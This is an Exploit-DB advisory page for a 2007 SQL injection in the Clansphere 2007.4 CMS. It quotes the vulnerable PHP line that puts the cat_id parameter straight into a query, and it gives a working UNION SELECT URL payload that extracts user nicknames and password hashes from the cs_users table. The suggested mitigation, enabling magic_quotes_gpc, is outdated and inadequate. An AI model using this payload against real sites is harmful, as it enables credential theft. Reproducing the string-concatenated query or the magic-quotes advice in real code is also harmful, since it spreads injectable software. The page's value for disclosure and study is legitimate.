Clansphere 2007.4 SQL Injection

vendor:

Clansphere

by:

Inclusion Hunter Team

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Clansphere

Affected Version From: Clansphere 2007.4

Affected Version To: Clansphere 2007.4

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Clansphere 2007.4 SQL Injection

The vulnerability allows an attacker to execute arbitrary SQL commands on the affected system.

Mitigation:

Enable magic_quotes_gpc to prevent SQL injection attacks.

Source

Exploit-DB raw data:

#########################################################################################
#
#        Inclusion Hunter Team
#        http://www.ihteam.net
#
#
#         [Clansphere 2007.4]
#
#
# Class:     SQL Injection
# Found:     22/09/2007
# Remote:    Yes
# Site:      http://www.clansphere.net/
# Download:  http://sourceforge.net/project/showfiles.php?group_id=95430
#
#########################################################################################


       Vulnerable code:
       mods/banners/navlist.php
============================================================================================================
if(!empty($_GET['cat_id'])) {
 $where = "categories_id = '" . $_GET['cat_id'] . "'";
============================================================================================================




       Exploit (!!!WORK ONLY WITH magic_quotes_gpc = Off!!!):
===================================================================================================================
http://www.site.com/[path]/index.php?mod=banners&cat_id=-1'%20UNION%20ALL%20SELECT%20null,concat(users_nick,0x3a,users_pwd),null,nu

ll%20FROM%20cs_users/*
===================================================================================================================


       Thanks To:
=================================
White_Sheep for his Bugs Hunter;
=================================

# milw0rm.com [2007-09-22]